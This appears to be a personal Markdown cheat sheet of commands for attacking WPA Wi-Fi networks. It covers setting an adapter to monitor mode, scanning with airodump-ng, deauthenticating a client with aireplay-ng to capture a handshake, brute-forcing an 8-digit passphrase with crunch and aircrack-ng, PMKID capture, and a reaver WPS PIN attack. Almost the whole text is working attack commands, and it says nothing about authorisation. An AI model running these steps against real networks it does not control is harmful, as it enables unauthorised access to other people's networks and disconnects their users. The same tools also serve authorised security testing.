68 lines
1.2 KiB
Markdown
68 lines
1.2 KiB
Markdown
## Monitor mode
|
|
For my RTL8188EUS:
|
|
|
|
```console
|
|
# ip link set wlanX down
|
|
# iw dev wlanX set type monitor
|
|
```
|
|
|
|
## Scan networks
|
|
|
|
All channels:
|
|
```console
|
|
# airodump-ng wlanX
|
|
```
|
|
Specific channel:
|
|
```console
|
|
# airodump-ng -c 6 wlanX
|
|
```
|
|
|
|
## Save a capture of chosen BSSID
|
|
|
|
```console
|
|
# airodump-ng -c 6 --bssid 00:23:B1:82:08:xx -w <filename> wlanX
|
|
```
|
|
|
|
You need to wait for a client to connect, or to deauth it and get the 4-way handshake.
|
|
```console
|
|
# aireplay-ng -0 1 -a 00:23:B1:82:0C:xx -c D0:37:45:2F:52:xx wlanX
|
|
```
|
|
`-a` is access point
|
|
`-c` is client
|
|
|
|
Then you should have an EAPOL/WPA handshake.
|
|
|
|
## Crack WPA passphrase
|
|
|
|
### For a 8 digits scheme
|
|
|
|
```console
|
|
$ crunch 8 8 0123456789 -s 00000000 | aircrack-ng -w - -b 00:23:B1:82:08:xx <filename>.cap
|
|
```
|
|
|
|
## Wireshark
|
|
|
|
PSK Generator: <https://www.wireshark.org/tools/wpa-psk.html>
|
|
|
|
## PMKID method
|
|
|
|
```console
|
|
$ hcxdumptool -i wlanX -o PMKID --enable_status=1
|
|
```
|
|
|
|
TODO...
|
|
|
|
## WPS method
|
|
|
|
AP must have WPS enabled with a PIN. Not PBC, push button.
|
|
|
|
```console
|
|
# reaver -i wlanX -b 00:23:B1:82:84:xx
|
|
```
|
|
|
|
## Resources
|
|
|
|
<https://github.com/ZerBea/hcxdumptool>
|
|
<https://github.com/ZerBea/hcxtools>
|
|
<https://wpa-sec.stanev.org/>
|